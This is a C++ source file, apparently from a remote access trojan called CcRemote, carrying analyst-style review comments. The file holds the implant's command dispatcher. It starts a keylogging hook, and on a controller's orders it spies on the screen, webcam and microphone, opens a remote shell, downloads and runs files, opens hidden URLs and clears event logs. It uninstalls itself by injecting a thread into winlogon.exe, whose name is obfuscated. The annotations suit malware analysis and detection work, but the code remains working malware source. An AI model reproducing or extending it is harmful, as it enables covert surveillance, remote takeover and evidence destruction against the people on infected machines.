CcRemote/CcMainDll/CcMainDll/common/KernelManager.cpp

// KernelManager.cpp: implementation of the CKernelManager class.
//
//////////////////////////////////////////////////////////////////////
#include "..\pch.h"
#include "KernelManager.h"
#include "loop.h"
#include "until.h"
#include "inject.h"
//////////////////////////////////////////////////////////////////////
// Construction/Destruction
//////////////////////////////////////////////////////////////////////
// Class-wide (static) controller endpoint shared by every CKernelManager instance;
// the constructor overwrites both values on each construction. The 256-byte host
// buffer is filled with lstrcpy in the constructor, which performs no length check.
char CKernelManager::m_strMasterHost[256] = {0};
// Port used until the constructor stores the caller-supplied value.
UINT CKernelManager::m_nMasterPort = 80;
// Constructs the kernel manager: copies the service name, kill-event name and
// controller host into fixed-size buffers, stores the port and service type, and
// starts the keyboard-hook worker thread immediately, before any controller
// command has been received.
//
// pClient         - socket wrapper handed to the CManager base.
// lpszServiceName - name of the installed service (NULL tolerated).
// dwServiceType   - service type value, consulted later in UnInstallService().
// lpszKillEvent   - name of the event created when the service is removed.
// lpszMasterHost  - controller host, written to the static m_strMasterHost.
// nMasterPort     - controller port, written to the static m_nMasterPort.
CKernelManager::CKernelManager(CClientSocket *pClient, LPCTSTR lpszServiceName, DWORD dwServiceType, LPCTSTR lpszKillEvent,
LPCTSTR lpszMasterHost, UINT nMasterPort) : CManager(pClient)
{
// NOTE(review): lstrcpy has no length bound. m_strMasterHost is 256 bytes (defined
// above); the sizes of m_strServiceName and m_strKillEvent are declared in the
// header and not visible here, so any caller-supplied string longer than the
// destination overflows the member buffer.
if (lpszServiceName != NULL)
{
lstrcpy(m_strServiceName, lpszServiceName);
}
if (lpszKillEvent != NULL)
lstrcpy(m_strKillEvent, lpszKillEvent);
if (lpszMasterHost != NULL)
lstrcpy(m_strMasterHost, lpszMasterHost);
m_nMasterPort = nMasterPort;
m_dwServiceType = dwServiceType;
m_nThreadCount = 0;
// Not active until the controller sends COMMAND_ACTIVED (see OnReceive); the
// flag is later written through InterlockedExchange as a LONG, although it is
// assigned a bool here — its declared type lives in the header.
m_bIsActived = false;
// Start the keyboard-hook monitoring thread now. The original comment notes that
// the keyboard hook and unhook must run on the same thread, hence a dedicated
// thread. From a detection standpoint this hook is installed unconditionally at
// construction, independent of any later activation. The slot index is advanced
// without a bounds check against the m_hThread array (size declared in header).
// MyCreateThread is a project wrapper; the meaning of its trailing bool argument
// is not visible in this file.
m_hThread[m_nThreadCount++] =
MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_HookKeyboard, NULL, 0, NULL, true);
}
// Forcibly ends every worker thread this object started and releases the handles.
CKernelManager::~CKernelManager()
{
for(int i = 0; i < m_nThreadCount; i++)
{
// TerminateThread stops the thread without running any of its cleanup — in
// particular the keyboard-hook thread never reaches its unhook path — and
// reports exit code -1. Threads that already exited are terminated/closed
// harmlessly because the handle is still open.
TerminateThread(m_hThread[i], -1);
CloseHandle(m_hThread[i]);
}
}
//--- Handles data sent by the controller. Each capability has a matching Loop_*
// thread function (e.g. Loop_FileManager) that is started here; activation is
// handled inline.
//
// Dispatches one controller message. lpBuffer[0] is the command byte and
// lpBuffer + 1 is the payload; most commands spawn a Loop_* worker thread that
// receives the client socket handle, the remainder act directly in this thread.
//
// NOTE(review): nSize is never consulted. lpBuffer[0], lpBuffer[1] and the
// payload (used as a NUL-terminated string in several cases) are read without
// checking that the message is long enough, and every new thread is stored via
// m_hThread[m_nThreadCount++] with no bound against the array size (header).
void CKernelManager::OnReceive(LPBYTE lpBuffer, UINT nSize)
{
switch (lpBuffer[0])
{
case COMMAND_ACTIVED:
// Mark the session active. The member was assigned as a bool in the
// constructor but is written here as a 4-byte LONG — if it is declared as a
// 1-byte bool this write spills into the neighbouring bytes (declaration not
// visible in this file; confirm in the header).
InterlockedExchange((LONG *)&m_bIsActived, true);
break;
case COMMAND_LIST_DRIVE: // file manager
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_FileManager,
(LPVOID)m_pClient->m_Socket, 0, NULL, false);
break;
case COMMAND_SCREEN_SPY: // screen viewing
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ScreenManager,
(LPVOID)m_pClient->m_Socket, 0, NULL, true);
break;
case COMMAND_WEBCAM: // camera
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_VideoManager,
(LPVOID)m_pClient->m_Socket, 0, NULL);
break;
case COMMAND_AUDIO: // audio recorder
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_AudioManager,
(LPVOID)m_pClient->m_Socket, 0, NULL);
break;
case COMMAND_SHELL: // remote shell (CMD)
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ShellManager,
(LPVOID)m_pClient->m_Socket, 0, NULL, true);
break;
case COMMAND_KEYBOARD: // keyboard record viewer
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_KeyboardManager,
(LPVOID)m_pClient->m_Socket, 0, NULL);
break;
case COMMAND_SYSTEM: // processes
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_SystemManager,
(LPVOID)m_pClient->m_Socket, 0, NULL);
break;
case COMMAND_WSLIST: // windows
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_WindowManager,
(LPVOID)m_pClient->m_Socket, 0, NULL);
break;
case COMMAND_DOWN_EXEC: // downloader
// Unlike the other workers, this thread gets a pointer into the caller-owned
// receive buffer rather than the socket handle.
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_DownManager,
(LPVOID)(lpBuffer + 1), 0, NULL, true);
// Original comment: "for passing the parameter" — presumably a delay so the new
// thread reads the payload before lpBuffer is reused; nothing here guarantees it.
Sleep(100);
break;
case COMMAND_OPEN_URL_SHOW: // open a web page visibly
OpenURL((LPCTSTR)(lpBuffer + 1), SW_SHOWNORMAL);
break;
case COMMAND_OPEN_URL_HIDE: // open a web page hidden
OpenURL((LPCTSTR)(lpBuffer + 1), SW_HIDE);
break;
case COMMAND_REMOVE: // uninstall
UnInstallService();
break;
case COMMAND_CLEAN_EVENT: // clear event logs
CleanEvent();
break;
case COMMAND_SESSION:
// Second byte selects the shutdown action; not range-checked here.
CSystemManager::ShutdownWindows(lpBuffer[1]);
break;
case COMMAND_RENAME_REMARK: // change the remark/host ID
SetHostID(m_strServiceName, (LPCTSTR)(lpBuffer + 1));
break;
case COMMAND_UPDATE_SERVER: // update the server component
// Only removes the current service if the update reported success.
if (UpdateServer((char *)lpBuffer + 1))
UnInstallService();
break;
case COMMAND_REPLAY_HEARTBEAT: // heartbeat reply — nothing to do
break;
}
}
// Removes the installed service and its on-disk artifacts, then creates the kill
// event so the main thread can exit. Steps, in order: rename the service DLL and
// schedule its deletion at reboot, delete the offline record file, remove the
// service (directly or via injection depending on the service type), create the
// kill event. Nothing here checks the return value of any Win32 call.
void CKernelManager::UnInstallService()
{
char strServiceDll[MAX_PATH];
char strRandomFile[MAX_PATH];
// Service DLL path: <SystemDirectory>\<ServiceName>ex.dll. lstrcat is unbounded;
// overflow is possible if m_strServiceName is long enough.
GetSystemDirectory(strServiceDll, sizeof(strServiceDll));
lstrcat(strServiceDll, "\\");
lstrcat(strServiceDll, m_strServiceName);
lstrcat(strServiceDll, "ex.dll");
// Rename the DLL to a tick-count-based .bak name and ask Windows to delete it at
// the next reboot. The .bak name carries no directory, so MoveFile resolves it
// against the process's current directory, not the system directory. Until the
// reboot, both the renamed file and the pending delete-at-reboot request remain
// on the system and are observable.
wsprintf(strRandomFile, "%d.bak", GetTickCount());
MoveFile(strServiceDll, strRandomFile);
MoveFileEx(strRandomFile, NULL, MOVEFILE_DELAY_UNTIL_REBOOT);
// Delete the offline record file <SystemDirectory>\syslog.dat.
char strRecordFile[MAX_PATH];
GetSystemDirectory(strRecordFile, sizeof(strRecordFile));
lstrcat(strRecordFile, "\\syslog.dat");
DeleteFile(strRecordFile);
// Obfuscated process name; the original comment says it decodes to "winlogon.exe".
char winlogon[] = { 0x0c,0xbc,0xa3,0xa7,0xa4,0xa8,0xa1,0xaa,0xaa,0xed,0xa7,0xb9,0xa5 }; //winlogon.exe
char* winlogon_exe = decodeStr(winlogon); // project decode helper (not visible here); appears to heap-allocate the result
// Original comment: an "owner"-process service cannot stop and delete itself, so
// the removal is done from a thread injected into another process; a "shared"-
// process service can remove itself. 0x120 matches
// SERVICE_WIN32_SHARE_PROCESS | SERVICE_INTERACTIVE_PROCESS — confirm against the
// header. The injection branch is the high-signal behaviour here: a remote thread
// created in winlogon.exe is what endpoint telemetry would surface.
if (m_dwServiceType != 0x120)
{
InjectRemoveService(winlogon_exe, m_strServiceName);
}
else
{
RemoveService(m_strServiceName);
}
// All steps done: create the named kill event. The returned handle is discarded
// and the event is created non-signalled (manual-reset); how the main thread
// observes it is not visible in this file.
CreateEvent(NULL, true, false, m_strKillEvent);
// Zero the decoded string before freeing it. Presumably index STR_CRY_LENGTH of
// the encoded buffer holds the decoded length — confirm in decodeStr. If decodeStr
// allocates with new[], this should be delete[] rather than delete.
memset(winlogon_exe, 0, winlogon[STR_CRY_LENGTH]);
delete winlogon_exe;
}
// Reports whether the controller has sent COMMAND_ACTIVED since construction.
// This is a plain (non-interlocked) read of a flag that OnReceive writes through
// InterlockedExchange as a LONG; the member's declared type is in the header and
// not visible here.
bool CKernelManager::IsActived()
{
return m_bIsActived;
}